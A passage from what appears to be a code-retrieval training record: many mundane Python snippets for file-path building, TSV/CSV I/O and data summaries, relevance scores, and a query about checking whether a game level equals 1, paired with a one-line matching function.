prop_stats[\"bins\"] = bins\n prop_stats[\"bin_number\"] = len(bins)\n\n else: # If its not in the list of ptypes, exit. 
Need to add array handling.\n print(\n \"\\t\\t\\n\\n\\n\\nUnhandled property type!\\n\\n '{}': {}\\n\\n\\n\\n\".format(\n prop_id, ptype\n )\n )\n exit()\n\n if bin_limit and isinstance(prop_stats[\"bins\"], list): # if bin_limit != False\n prop_stats[\"bins\"] = prop_stats[\"bins\"][: int(bin_limit)]\n\n #report = report.append(prop_stats, ignore_index=True)\n # print(\"\\n{}\\n\".format(report))\n # print(\"\\n{}\\n\".format(prop_stats))\n pdf = pd.DataFrame.from_records([prop_stats])\n pdf['all_null'] = pdf['all_null'].astype(bool)\n report = pd.concat([report,pdf])\n\n\n if not report_null: # if report_null == False\n report = report.loc[report[\"all_null\"] != True]\n\n # strip the col names so we can sort the report\n report.columns = report.columns.str.strip()\n report.sort_values(by=[\"all_null\", \"node\", \"property\"], inplace=True)\n\n summary[\"report\"] = report\n summary[\"all_prop_ids\"] = all_prop_ids\n\n # summarize all properties\n nn_props = sorted(list(set(nn_props)))\n summary[\"nn_props\"] = nn_props\n\n null_props = [prop for prop in null_props if prop not in nn_props]\n summary[\"null_props\"] = sorted(list(set(null_props)))\n\n # summarize all nodes\n nn_nodes = sorted(list(set(nn_nodes)))\n summary[\"nn_nodes\"] = nn_nodes\n\n dd_regex = re.compile(r\"[^_][A-Za-z0-9_]+\")\n dd_nodes = list(filter(dd_regex.match, list(dd)))\n dd_nodes = [node for node in dd_nodes if node not in omit_nodes]\n null_nodes = [node for node in dd_nodes if node not in nn_nodes]\n\n summary[\"null_nodes\"] = null_nodes\n\n if write_report: # write_report == True\n\n self.create_output_dir(outdir=outdir)\n\n if \"/\" in tsv_dir:\n names = tsv_dir.split(\"/\")\n names = [name for name in names if name != \"\"]\n name = names[-1]\n else:\n name = tsv_dir\n\n outname = \"data_summary_{}.tsv\".format(name)\n outname = \"{}/{}\".format(\n outdir, outname\n ) # ./data_summary_prod_tsvs_04272020.tsv\n\n report.to_csv(outname, sep=\"\\t\", index=False, encoding=\"utf-8\")\n sys.stdout.write(\"\\rReport written to file:\".ljust(200, \" \"))\n print(\"\\n\\t{}\".format(outname))\n\n return summary", "def out_featuretxt(self):\n return self.outputfrominput(inputformat='csv', stripextension='.csv', addextension='.features.csv')", "def get_T2_tiff_path(path_TIFF, i, annotations='T2M+'):\n\tpath_pat = os.path.join(path_TIFF, i)\n\tfinal_path = os.path.join(path_pat, i + annotations)\n\treturn final_path", "def _prettyfilename(self):\n return f'{self.title} ({self.year})'", "def _get_output_filename(dataset_dir):\n return os.path.join(dataset_dir, 'pokemon.tfrecord')", "def output():\n\n if args.top and not args.tfidf and not args.svd:\n most_frequent(vector).to_csv(path_or_buf=\"top{}_vectorfile.csv\".format(args.top))\n\n elif args.top and args.tfidf and not args.svd:\n tfidf_transform(most_frequent(vector)).to_csv(path_or_buf=\"tfidf_top{}.csv\".format(args.top))\n\n elif args.top and args.tfidf and args.svd:\n svd_transform(tfidf_transform(most_frequent(vector)), indexes).to_csv(path_or_buf=\"svd{}_tfidf_topn.csv\".format(args.svd))\n\n elif args.tfidf and not args.top and not args.svd:\n tfidf_transform(vector).to_csv(path_or_buf=\"tfidf.csv\")\n\n elif args.svd and not args.top and not args.tfidf:\n svd_transform(vector, indexes).to_csv(path_or_buf=\"svd{}_vector.csv\".format(args.svd))\n\n elif args.tfidf and args.svd and not args.top:\n svd_transform(tfidf_transform(vector), indexes).to_csv(path_or_buf=\"svd{}_tfidf.csv\".format(args.svd))\n\n else:\n 
vector.to_csv(path_or_buf=\"vectorfile.csv\")", "def get_format_table(self):\n try:\n with open(self._config.values['format'], 'r') as f:\n return f.read()\n except:\n return None", "def get_tdf_file(path):\r\n \r\n prj_file_path = os.path.join(path,\".project\")\r\n if os.path.exists(prj_file_path):\r\n etree = ElementTree.parse(prj_file_path)\r\n \r\n el_name = etree.find(\"name\")\r\n if el_name != None:\r\n return el_name.text\r\n else:\r\n logging.getLogger('cone.thememl').error(\"The element name is not in %s\" % prj_file_path)\r\n else:\r\n logging.getLogger('cone.thememl').info(\"No .project file found. Trying to find tdf file.\")\r\n for root,dirs,files in os.walk(path):\r\n for f in files:\r\n if f.endswith('tdf'):\r\n return re.sub('\\.tdf', '', os.path.join(root, f))", "def _get_otype(cls, fname):\n with open(fname) as foo:\n line = foo.readline()\n if \"zonebudget version\" in line.lower():\n otype = 0\n elif \"time step\" in line.lower():\n otype = 1\n elif \"totim\" in line.lower():\n otype = 2\n else:\n raise AssertionError(\"Cant distinguish output type\")\n return otype", "def file_path(self):\n return self._obs_file()", "def svn_info_t_prejfile_get(svn_info_t_self): # real signature unknown; restored from __doc__\n return \"\"", "def get_filename(self, exported_datetime=None):\n formatted_model = self.model_cls._meta.label_lower.replace(\".\", \"_\")\n formatted_date = exported_datetime.strftime('%Y%m%d%H%M%S')\n return f'{formatted_model}_{formatted_date}.csv'", "def createFileCSV(table, path=\"./prediction\"):\t\n\tif len(table) < 1:\n\t\traise NameError('Empty Table!')\n\telse:\n\t\tfile = open(path + '.csv', 'w+')\n\n\t\tfile.write(table[0].toStringHeaders() + \"\\n\")\n\n\t\tfor row in table:\n\t\t\tfile.write(row.toStringCSV() + '\\n')\n\t\tfile.close()", "def _get_target_name(self, n, k, att, pol, emb_dim):\n threshold = str(int(self.threshold * 10))\n agg_name = \"_{}_{}_{}_{}_{}_{}\".format(n, k, att, pol, emb_dim, threshold)\n target_file = self.source_file[:-4] + agg_name + \".csv\"\n return target_file", "def sirv_report_txt(self):\n return op.join(self.root_dir, 'SIRV_evaluation_summary.txt')", "def _get_tree_file(h5_file):\n f_name = os.path.basename(h5_file)\n try:\n year = parse_year(f_name)\n tree_file = f_name.split(str(year))[0] + 'tree.pkl'\n except RuntimeError:\n tree_file = f_name.replace('.h5', '_tree.pkl')\n\n return tree_file", "def convertSVT(svtImgDir, svtXMLFile, outPrefix, objectives):\n\n imgFileList, wordList = svtXML(svtXMLFile)\n lenList, charMat = wordsToChars(wordList)\n outFilenames = makeLabelFiles(objectives, svtImgDir, imgFileList, lenList,\n charMat, outPrefix)\n return outFilenames", "def new_tree_file_name(alignment):\n return '%s.tre' % alignment", "def get_tsv_dataset(dataset_path):\n if not os.path.exists(dataset_path):\n logging.error('No such path %s', dataset_path)\n return None\n\n try:\n ds_file = open(dataset_path)\n data = ds_file.readline().strip().split('\\t')\n return data\n except Exception:\n logging.error('Unexpected error getting data from %s', dataset_path, exc_info=True)\n\n # would have happened automatically, but explicit is always better than implicit\n return None", "def _scans_tsv(raw, raw_fname, fname, keep_source, overwrite=False):\n # get measurement date in UTC from the data info\n meas_date = raw.info[\"meas_date\"]\n if meas_date is None:\n acq_time = \"n/a\"\n elif isinstance(meas_date, datetime):\n acq_time = meas_date.strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\")\n\n # for fif files check whether raw file 
is likely to be split\n raw_fnames = [raw_fname]\n if raw_fname.endswith(\".fif\"):\n # check whether fif files were split when saved\n # use the files in the target directory what should be written\n # to scans.tsv\n datatype, basename = raw_fname.split(os.sep)\n raw_dir = op.join(op.dirname(fname), datatype)\n raw_files = [f for f in os.listdir(raw_dir) if f.endswith(\".fif\")]\n if basename not in raw_files:\n raw_fnames = []\n split_base = basename.replace(\"_meg.fif\", \"_split-{}\")\n for raw_f in raw_files:\n if len(raw_f.split(\"_split-\")) == 2:\n if split_base.format(raw_f.split(\"_split-\")[1]) == raw_f:\n raw_fnames.append(op.join(datatype, raw_f))\n raw_fnames.sort()\n\n data = OrderedDict(\n [\n (\n \"filename\",\n [\"{:s}\".format(raw_f.replace(os.sep, \"/\")) for raw_f in raw_fnames],\n ),\n (\"acq_time\", [acq_time] * len(raw_fnames)),\n ]\n )\n\n # add source filename if desired\n if keep_source:\n data[\"source\"] = [Path(src_fname).name for src_fname in raw.filenames]\n\n # write out a sidecar JSON if not exists\n sidecar_json_path = Path(fname).with_suffix(\".json\")\n sidecar_json_path = get_bids_path_from_fname(sidecar_json_path)\n sidecar_json = {\"source\": {\"Description\": \"Original source filename.\"}}\n\n if sidecar_json_path.fpath.exists():\n update_sidecar_json(sidecar_json_path, sidecar_json)\n else:\n _write_json(sidecar_json_path, sidecar_json)\n\n if os.path.exists(fname):\n orig_data = _from_tsv(fname)\n # if the file name is already in the file raise an error\n if raw_fname in orig_data[\"filename\"] and not overwrite:\n raise FileExistsError(\n f'\"{raw_fname}\" already exists in '\n f\"the scans list. Please set \"\n f\"overwrite to True.\"\n )\n\n for key in data.keys():\n if key in orig_data:\n continue\n\n # add 'n/a' if any missing columns\n orig_data[key] = [\"n/a\"] * len(next(iter(data.values())))\n\n # otherwise add the new data\n data = _combine_rows(orig_data, data, \"filename\")\n\n # overwrite is forced to True as all issues with overwrite == False have\n # been handled by this point\n _write_tsv(fname, data, True)", "def ts_to_filepath(self, timestamp, room_name):\n path = \"{output_directory}/{room_name}_{date}.log\"\n # synapse timestamps are in milliseconds\n date = datetime.utcfromtimestamp(timestamp / 1000).strftime(\"%Y%m%d\")\n return path.format(\n output_directory=self.output_directory, room_name=room_name, date=date\n )", "def _prettyfilename(self):\n return self.title", "def tsv_generator(file):\n for line in fileinput.input(file):\n article, summary = line.strip().split(\"\\t\")\n yield (article, summary)", "def get_hypervisor_std_file(uuid):\n return DIR + uuid + \"-hypervisor-usage-std.csv\"", "def outfile(self):\n return os.path.join(self.outfile_dir, constant.OUTFILE_TABLE + self.table_name)", "def getFile(self, stamp):\n name = escapeForPath(str(stamp))\n return os.path.join(self.path, name)", "def collapsed_to_sirv_gff(self):\n return op.join(self.collapse_to_sirv_dir, \"touse.gff\")", "def summary(args):\n from jcvi.formats.base import DictFile\n from jcvi.utils.cbook import percentage, Registry\n\n p = OptionParser(summary.__doc__)\n p.add_option(\"--extra\", help=\"Cross with extra tsv file\")\n opts, args = p.parse_args(args)\n\n if len(args) != 2:\n sys.exit(not p.print_help())\n\n frfile, statusfile = args\n status = DictFile(statusfile)\n fp = open(frfile)\n registry = Registry() # keeps all the tags for any given gene\n for row in fp:\n seqid, gene, tag = row.split()\n if tag == \".\":\n 
registry[gene].append(\"outside\")\n else:\n registry[gene].append(\"inside\")\n if tag[0] == \"[\":\n registry[gene].append(\"no_syntenic_model\")\n if tag.startswith(\"[S]\"):\n registry[gene].append(\"[S]\")\n gstatus = status.get(gene, None)\n if gstatus == \"complete\":\n registry[gene].append(\"complete\")\n elif gstatus == \"pseudogene\":\n registry[gene].append(\"pseudogene\")\n elif gstatus == \"partial\":\n registry[gene].append(\"partial\")\n else:\n registry[gene].append(\"gmap_fail\")\n elif tag.startswith(\"[NS]\"):\n registry[gene].append(\"[NS]\")\n if \"random\" in tag or \"Scaffold\" in tag:\n registry[gene].append(\"random\")\n else:\n registry[gene].append(\"real_ns\")\n elif tag.startswith(\"[NF]\"):\n registry[gene].append(\"[NF]\")\n else:\n registry[gene].append(\"syntenic_model\")\n\n inside = registry.count(\"inside\")\n outside = registry.count(\"outside\")\n syntenic = registry.count(\"syntenic_model\")\n non_syntenic = registry.count(\"no_syntenic_model\")\n s = registry.count(\"[S]\")\n ns = registry.count(\"[NS]\")\n nf = registry.count(\"[NF]\")\n complete = registry.count(\"complete\")\n pseudogene = registry.count(\"pseudogene\")\n partial = registry.count(\"partial\")\n gmap_fail = registry.count(\"gmap_fail\")\n random = registry.count(\"random\")\n real_ns = registry.count(\"real_ns\")\n\n complete_models = registry.get_tag(\"complete\")\n pseudogenes = registry.get_tag(\"pseudogene\")\n partial_deletions = registry.get_tag(\"partial\")\n\n m = \"{0} inside synteny blocks\\n\".format(inside)\n m += \"{0} outside synteny blocks\\n\".format(outside)\n m += \"{0} has syntenic gene\\n\".format(syntenic)\n m += \"{0} lack syntenic gene\\n\".format(non_syntenic)\n m += \"{0} has sequence match in syntenic location\\n\".format(s)\n m += \"{0} has sequence match in non-syntenic location\\n\".format(ns)\n m += \"{0} has sequence match in un-ordered scaffolds\\n\".format(random)\n m += \"{0} has sequence match in real non-syntenic location\\n\".format(real_ns)\n m += \"{0} has no sequence match\\n\".format(nf)\n m += \"{0} syntenic sequence - complete model\\n\".format(percentage(complete, s))\n m += \"{0} syntenic sequence - partial model\\n\".format(percentage(partial, s))\n m += \"{0} syntenic sequence - pseudogene\\n\".format(percentage(pseudogene, s))\n m += \"{0} syntenic sequence - gmap fail\\n\".format(percentage(gmap_fail, s))\n print(m, file=sys.stderr)\n\n aa = [\"complete_models\", \"partial_deletions\", \"pseudogenes\"]\n bb = [complete_models, partial_deletions, pseudogenes]\n for a, b in zip(aa, bb):\n fw = open(a, \"w\")\n print(\"\\n\".join(b), file=fw)\n fw.close()\n\n extra = opts.extra\n if extra:\n registry.update_from(extra)\n\n fp.seek(0)\n fw = open(\"registry\", \"w\")\n for row in fp:\n seqid, gene, tag = row.split()\n ts = registry[gene]\n print(\"\\t\".join((seqid, gene, tag, \"-\".join(ts))), file=fw)\n fw.close()\n\n logging.debug(\"Registry written.\")", "def get_traj_status(self, traj):\n raise NotImplementedError", "def write_tsvs(raw_dir: Path, bids_dir: Path):\n\n print(\"Writing tsvs.\")\n\n for path_to_onset in Path(raw_dir/\"onset_textfiles\").glob(\"*.txt\"):\n\n onsets_as_lines_with_too_much_whitespace = path_to_onset.read_text().splitlines()\n onsets = [line.strip() for line in onsets_as_lines_with_too_much_whitespace]\n\n tsv_lines_without_a_header = [onset + \"\\t\" + \"4\" for onset in onsets]\n tsv_lines = [\"onset\" + \"\\t\" + \"duration\"] + tsv_lines_without_a_header\n full_text_of_tsv = \"\\n\".join(tsv_lines)\n\n 
subject_id = subject_id_of(path_to_onset)\n task_id = path_to_onset.stem.split(\"_\")[1]\n\n func_path_to_imitate = the_path_that_matches(f\"*_task-{task_id}*.nii\", in_directory=bids_dir/f\"sub-{subject_id}/func\")\n func_stem_split_into_parts = func_path_to_imitate.stem.split(\"_\")\n tsv_stem_split_into_parts = func_stem_split_into_parts[:-1] + [\"events\"]\n tsv_stem = \"_\".join(tsv_stem_split_into_parts)\n tsv_path = func_path_to_imitate.with_name(tsv_stem + \".tsv\")\n\n tsv_path.write_text(full_text_of_tsv)", "def save_annotations_table(annotations: dict, outfile: str):\n\n vals = [a.table_data() for a in annotations.values()]\n\n df = pd.DataFrame(vals)\n\n df.to_csv(outfile)", "def get_tilename_cache_file(tablename):\n dir=get_tilename_cache_dir()\n fname='%s-tilenames.fits' % tablename\n return os.path.join(dir, fname)", "def info_file(self):\n return self._info_file", "def flag_file(self):\n return os.path.join(self.flag_dir, self.flag_name)", "def out_filename(self, filetype, dir, format='old'):\n filename = self.filename(filetype=filetype, format=format)\n return Path(dir) / filename", "def _write_tsv(\n output_path,\n records,\n):\n df = pandas.DataFrame(records)\n output_path.write_text(df.to_csv(index=False, sep='\\t'))", "def tiltmeter_output_by_deployment(deployment):\n cur_file = f\"proc_current_profile_{deployment}.csv\"\n cur_file = os.path.join(os.getenv(\"SENTRY_DATA\"),\n f\"tiltmeter/proc/{cur_file}\")\n return cur_file", "def generate_filename(self):\n file_pattern = os.path.join(self.path, \"TCGA-*\")\n for f in glob(file_pattern):\n organ = get_organ(f)\n for raw_f in glob(os.path.join(f, \"*.tif\")):\n gt_f = raw_f.replace(\".tif\", \".xml\")\n yield raw_f, gt_f, organ", "def _read_tsv(cls, input_file, quotechar=None):\n with tf.gfile.Open(input_file,\"r\") as f:\n reader = csv.reader(f,delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def get_vignettes_data(file_path, vignette_type, classification_type):\n df = pd.read_csv(file_path, index_col=False)\n df = df[df[\"dataset\"] == vignette_type]\n\n if classification_type == \"polar\":\n return df[\"text\"].values, df[\"polarity\"].values\n return df[\"text\"].values, df[\"category\"].values", "def tsv_sheet_germline_platform_name():\n f = io.StringIO(\n textwrap.dedent(\n \"\"\"\n patientName\\tfatherName\\tmotherName\\tsex\\tisAffected\\tlibraryType\\tfolderName\\thpoTerms\\tseqPlatform\n 12_347\\t.\\t.\\tF\\tN\\tWGS\\t12_347\\t.\\tIllumina\n 12_347\\t.\\t.\\tF\\tN\\tWGS\\t12_347\\t.\\tPacBio\n \"\"\".lstrip()\n )\n )\n return f", "def tsv_sheet_germline_no_header():\n f = io.StringIO(\n textwrap.dedent(\n \"\"\"\n patientName\\tfatherName\\tmotherName\\tsex\\tisAffected\\tlibraryType\\tfolderName\\thpoTerms\n 12_345\\t12_346\\t12_347\\tM\\tY\\tWGS\\t12_345\\tHP:0009946,HP:0009899\n 12_348\\t12_346\\t12_347\\tM\\tN\\tWGS\\t12_348\\t.\n 12_346\\t.\\t.\\tM\\tN\\t.\\t.\\t.\n 12_347\\t.\\t.\\tF\\tN\\tWGS\\t12_347\\t.\n \"\"\".lstrip()\n )\n )\n return f", "def _get_csv_path(name):\n return os.path.join(cwd, 'output/app_info', name)", "def get_filename_df(level, env='stage', pattern=None):\n fnames = get_filenames(level, env=env, pattern=pattern)\n iuvs_fnames = []\n for fname in fnames:\n if not level == 'hk':\n iuvs_fnames.append(ScienceFilename(fname))\n else:\n iuvs_fnames.append(HKFilename(fname))\n df = pd.DataFrame([fname.as_series() for fname in iuvs_fnames])\n if level != 'hk':\n df['channel'] = df.channel.astype('category')\n 
df.set_index('time', inplace=True)\n df.sort_index(inplace=True)\n # next line filters for newest revisions\n return df[df.p.isin(df.groupby('obs_id', sort=False)['p'].max())]", "def _filepath(self, filename):\n return os.path.join(self.root, self.version, filename)", "def getLevel(unique_name):", "def feature_table(chr_id, source, orient, genes, transcripts, cds, exons, unk):\n for gname, ginfo in genes.items():\n line = [str(chr_id), \n 'gbk_to_gff',\n ginfo[3],\n str(ginfo[0]),\n str(ginfo[1]),\n '.',\n ginfo[2],\n '.',\n 'ID='+str(gname)+';Name='+str(gname)+';Note='+ginfo[-1]]\n print '\\t'.join(line) \n ## construct the transcript line is not defined in the original file \n t_line = [str(chr_id), 'gbk_to_gff', source, 0, 1, '.', ginfo[2], '.'] \n\n if not transcripts:\n t_line.append('ID=Transcript:'+str(gname)+';Parent='+str(gname))\n\n if exons: ## get the entire transcript region from the defined feature\n t_line[3] = str(exons[gname][0][0])\n t_line[4] = str(exons[gname][0][-1])\n elif cds:\n t_line[3] = str(cds[gname][0][0])\n t_line[4] = str(cds[gname][0][-1])\n print '\\t'.join(t_line) \n\n if exons:\n exon_line_print(t_line, exons[gname], 'Transcript:'+str(gname), 'exon')\n\n if cds:\n exon_line_print(t_line, cds[gname], 'Transcript:'+str(gname), 'CDS')\n if not exons:\n exon_line_print(t_line, cds[gname], 'Transcript:'+str(gname), 'exon')\n\n else: ## transcript is defined \n for idx in transcripts[gname]: \n t_line[2] = idx[3]\n t_line[3] = str(idx[0])\n t_line[4] = str(idx[1])\n t_line.append('ID='+str(idx[2])+';Parent='+str(gname))\n print '\\t'.join(t_line) \n \n ## feature line print call \n if exons:\n exon_line_print(t_line, exons[gname], str(idx[2]), 'exon')\n if cds:\n exon_line_print(t_line, cds[gname], str(idx[2]), 'CDS')\n if not exons:\n exon_line_print(t_line, cds[gname], str(idx[2]), 'exon')\n\n if len(genes) == 0: ## feature entry with fragment information \n \n line = [str(chr_id), 'gbk_to_gff', source, 0, 1, '.', orient, '.'] \n fStart = fStop = None \n\n for eid, ex in cds.items(): \n fStart = ex[0][0] \n fStop = ex[0][-1]\n\n for eid, ex in exons.items(): \n fStart = ex[0][0] \n fStop = ex[0][-1]\n\n if fStart or fStart:\n\n line[2] = 'gene'\n line[3] = str(fStart)\n line[4] = str(fStop)\n line.append('ID=Unknown_Gene_' + str(unk) + ';Name=Unknown_Gene_' + str(unk))\n print \"\\t\".join(line)\n\n if not cds:\n line[2] = 'transcript'\n else:\n line[2] = 'mRNA'\n line[8] = 'ID=Unknown_Transcript_' + str(unk) + ';Parent=Unknown_Gene_' + str(unk)\n print \"\\t\".join(line)\n \n if exons:\n exon_line_print(line, cds[None], 'Unknown_Transcript_' + str(unk), 'exon')\n \n if cds:\n exon_line_print(line, cds[None], 'Unknown_Transcript_' + str(unk), 'CDS')\n if not exons:\n exon_line_print(line, cds[None], 'Unknown_Transcript_' + str(unk), 'exon')\n \n unk +=1 \n\n return unk", "def _level_info(entity):\n if entity.is_max_level():\n return 'Maxed'\n if entity.max_level is not None:\n return '{entity.level}/{entity.max_level}'.format(entity=entity)\n return entity.level", "def get_vetted_sample(self):\n list_of_files = glob.glob(self.final_path)\n latest_file = max(list_of_files, key=os.path.getctime)\n df = pd.read_csv(latest_file)\n return df", "def create_tvel_file(\n depth: np.array,\n vp: np.array,\n vs: np.array,\n dens: np.array,\n save_folder: str,\n name: str = \"Test\",\n):\n\n assert (\n len(depth) == len(vp) and len(depth) == len(vs) and len(depth) == len(dens)\n ), \"All arrays (depth, vp, vs and dens) should be of same length\"\n\n \"\"\" combining all 
the data vector \"\"\"\n data = np.vstack((np.vstack((np.vstack((depth, vp)), vs)), dens)).T\n\n with open(join(save_folder, f\"{name}.tvel\"), \"w\") as f:\n f.write(\"# Input file for TauP\\n\")\n f.write(\"NAME TAYAK_BKE\\n\")\n for line in data:\n f.write(f\"{line[0]:8.2f}{line[1]:8.3f}{line[2]:8.3f}{line[3]:8.3f}\\n\")\n f.write(\n \"\"\" 1596.98 4.986 0.000 5.855\n 1853.05 5.150 0.000 6.025\n 2109.13 5.284 0.000 6.166\n 2365.20 5.393 0.000 6.280\n 2621.27 5.475 0.000 6.368\n 2877.35 5.534 0.000 6.430\n 3133.42 5.569 0.000 6.467\n 3389.50 5.569 0.000 6.467\"\"\"\n )\n f.close()", "def output(self):\n print(\">>>>>\\n\")\n print(self.input()[0].path)\n return GCSTarget(self.input()[0].path + '.label.csv')", "def write_tsv(labels, positions, elec_file):\n labels = labels.reshape(-1, order='F')\n positions = positions.reshape(-1, 3, order='F')\n\n elec_file = elec_file.with_suffix('.tsv')\n with elec_file.open('w') as f:\n f.write('name\\tx\\ty\\tz\\n')\n for i in range(labels.shape[0]):\n f.write(f'{labels[i]}\\t{positions[i, 0]:.3f}\\t{positions[i, 1]:.3f}\\t{positions[i, 2]:.3f}\\n')", "def open_trajectory(basename):\n if os.path.isfile(basename + '.trr'):\n print \"Detected GROMACS trajectory\"\n return gromacs.Trajectory(basename)\n if os.path.isfile(basename + '.psf'):\n print \"Detected NAMD trajectory\"\n return namd.Trajectory(basename)\n if os.path.isfile(basename + '.top'):\n print \"Detected AMBER trajectory\"\n return amber.Trajectory(basename)\n raise ValueError(\"No trajectories found at all!\")", "def _read_tsv(cls, input_file, quotechar='\"'):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def _read_tsv(cls, input_file, quotechar=None):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def get_traces(self):\n\n self.rank = 0\n traces = []\n sub_traces = []\n current = []\n with open(self.file_path, 'r') as f:\n for line in f:\n current.append(line.strip('\\n').replace('<', '\\<').replace('>', '\\>'))\n sub_traces.append(current)\n traces.append(sub_traces)\n return traces", "def gread(cls, file, sextractor=False, format=None):\n import astropy.units as u\n \n if format is None: \n if sextractor:\n format = 'ascii.sextractor'\n else: \n if file.endswith('.fits'):\n format='fits'\n elif file.endswith('.csv'):\n format = 'csv'\n else:\n format = 'ascii.commented_header'\n \n #print(file, format) \n tab = cls.read(file, format=format)\n \n return tab", "def extract_ver_lab_anno(gt_file):\n vertices = []\n labels = []\n annotations = []\n with open(gt_file, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n line = line.strip().rstrip('\\n').lstrip('\\ufeff').strip().split(',', maxsplit=8)\n vertices.append(list([int(ver) for ver in line[:8]]))\n annotations.append(str(line[-1]).strip())\n if str(line[-1]).strip() == \"\" or str(line[-1]).strip() is None or len(str(line[-1]).strip()) < 1:\n labels.append(0)\n else:\n labels.append(1)\n\n return np.array(vertices), np.array(labels), np.array(annotations)" ]
[ "0.5939053", "0.5729971", "0.54536223", "0.51073116", "0.5047787", "0.5043582", "0.50271034", "0.5015402", "0.48891845", "0.48566693", "0.48362452", "0.48115683", "0.4806834", "0.4803698", "0.48016763", "0.47835353", "0.47271547", "0.47254357", "0.47245374", "0.47214988", "0.46874157", "0.46772584", "0.46699622", "0.46611837", "0.4651956", "0.46019983", "0.45954007", "0.45713425", "0.45518386", "0.45490912", "0.45485348", "0.45376378", "0.45313516", "0.44896996", "0.44761717", "0.44668922", "0.44664097", "0.4455608", "0.4446775", "0.44218254", "0.4421819", "0.4414594", "0.44113186", "0.44103092", "0.44083104", "0.4402147", "0.43950897", "0.4390959", "0.43861407", "0.43791932", "0.43791187", "0.4378119", "0.43762192", "0.43736315", "0.43681407", "0.43667012", "0.43648407", "0.43582428", "0.43556207", "0.4354956", "0.43542072", "0.43502", "0.43486828", "0.43485337", "0.43422386", "0.43381086", "0.43377814", "0.4330142", "0.43296298", "0.43260092", "0.43243438", "0.4324302", "0.43218195", "0.43214694", "0.43147564", "0.4313136", "0.4312467", "0.43089533", "0.4307697", "0.4307362", "0.43004474", "0.4291125", "0.42907646", "0.42809418", "0.42782474", "0.4275567", "0.42731687", "0.4272167", "0.42707175", "0.426916", "0.4264842", "0.4264756", "0.42578074", "0.42572916", "0.4255483", "0.42504385", "0.42488882", "0.4246877", "0.42396438", "0.42387766" ]
0.6666001
0
Indicate whether the current level is level 1 (colonization).
def colonization(): return get('level') == 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_single_level(self):\n return self.fragments_tree.height <= 2", "def is_flat(self):\n if self.master:\n return self.master.is_flat\n\n return len(self.levels) == 1", "def is_top_level(self) -> bool:\n return self._indent == ''", "def top_left_dot(self) -> bool:\n return bool(self._getindicator(1))", "def master(self):\n return self.depth == 0", "def unnecessary_colon(self):\n if self.line.endswith(':'):\n return True", "def first_level_text_is_displayed(self):\n first_level_text = self.driver.find_element_by_name(self.FIRST_LEVEL_TEXT_NAME)\n return first_level_text.is_displayed()", "def is_multi_level(self):\n return self.is_flag_set(StatefulParser.FLAGS.MULTI_LEVEL)", "def is_1DNN(self):\n if not self.dims == 1:\n return False\n if not set(self.__m__.keys()) <= set(((0,),(1,),(-1,))):\n return False\n\n return True", "def node_leaf(self):\r\n return self.zero_son is None and self.one_son is None", "def has_leaf(self) -> bool:\r\n self._logger.debug(log_message_formatter(\r\n \"get\", f\"{self}\", \"has_leaf\"))\r\n return self._hvac_mode == \"eco\"", "def isSetInitialLevel(self):\n return _libsbml.QualitativeSpecies_isSetInitialLevel(self)", "def isAutoLevel(self):\n return self.getAutoLevelFunction() is not None", "def path_is_base(self, path):\n\n return path is not None and len(path) == len(self.levels)", "def is_core(self):\n #core_stems = (\n # 'Algebra','Geometry','Precalculus','Calculus',\n # 'Biology','Chemistry','Physics','Living Environment','Global Environment','Scientific Literacy',\n # 'History','Economics',\n # 'Literature','Language','Writing','AP','Sem',\n # 'Korean',\n # )\n #core = False\n #for stem in core_stems:\n # if stem in self.title:\n # core = True\n \n return self.level>0", "def is_up(self):\n \n return self.is_level('up')", "def is_leaf(self) -> bool:\n return self.data_bytes[0] == ProofPath._KeyPrefix.LEAF", "def is_lattice(self):\n return hasattr(self,\"uc\") and len(self.maximals())==1 and type(self.get_meet())!=str and type(self.get_join())!=str", "def is_diagonal(self):\n return self.is_upper() and self.is_lower()", "def not_known_depth_header(pair):\n _, parent = pair\n return (not parent.title or\n not title_label_pair(\n parent.title, self.appendix_letter, self.part))", "def bottom_left_dot(self) -> bool:\n return bool(self._getindicator(2))", "def is_root(self):\n return self.root in [-1, self]", "def is_leaf(self):\n return len(self.blocks) == 0", "def is_leaf(self):\r\n return self.num_children() == 0", "def tree_has_single_path(self, node):\n num_children = len(node.children)\n if num_children > 1:\n return False\n elif num_children == 0:\n return True\n else:\n return True and self.tree_has_single_path(node.children[0])", "def is_root(self):\n return self.parent == None", "def is_root(self):\n return self.parent_id is None", "def is_leaf(self):\n return len(self.child_list) == 0", "def is_root(self):\n return \"/\" == self.h5_path", "def has_parent_key(self):\n if self.is_root():\n return False\n try:\n self.parent_key()\n return True\n except ParseException:\n return False", "def is_root(self) -> bool:\n return self.parent_id is None", "def is_leaf(self):\n if len(self.children) == 0:\n return True\n else:\n return False", "def is_diagonal(self):\n return self.rep.is_diagonal()", "def leaf(self):\n if not self._leftchild and not self._rightchild:\n return True\n return False", "def is_simple(self):\n return self.upper_binary_tree() == self.lower_binary_tree()", "def leaf(self):\n if not self.left and not self.right:\n return True\n 
return False", "def is_leaf(self):\n return len(self.children) == 0", "def is_leaf(self):\n return self.pixel_count > 0", "def is_leaf(self):\n return self.__left == None and self.__right==None", "def is_on(self, level):\n\n return self.log_level >= level", "def is_leaf(self):\n return self._children == {}", "def is_leaf(self):\n return self._children == {}", "def is_leaf(self):\n return self._children == {}", "def is_leaf(self):\n return self._children == {}", "def isLeaf(self):\n return self.left is None and self.right is None", "def es_hoja(self) -> bool:\n return len(self.children) == 0", "def IsRoot(self):\n return not self._parent_group", "def is leaf(self, p):\n return self.num children(p) == 0", "def is_root(self):\n return self._parent == None", "def _is_label(self) -> bool:\n return self.lines[self.counter].startswith(\"(\") and self.lines[\n self.counter\n ].endswith(\")\")", "def has_connection_left(tile):\n return is_kth_bit_set(tile, 1)", "def is_stack(self) -> bool:\n return self.layers > 1", "def _is_start(self, line):\n if re.match(\".*\\:\\s*\\(groupid\", line):\n return True", "def is_root(self):\n return not self.parent", "def is_left_coset(self):\n return str(self._dir) == 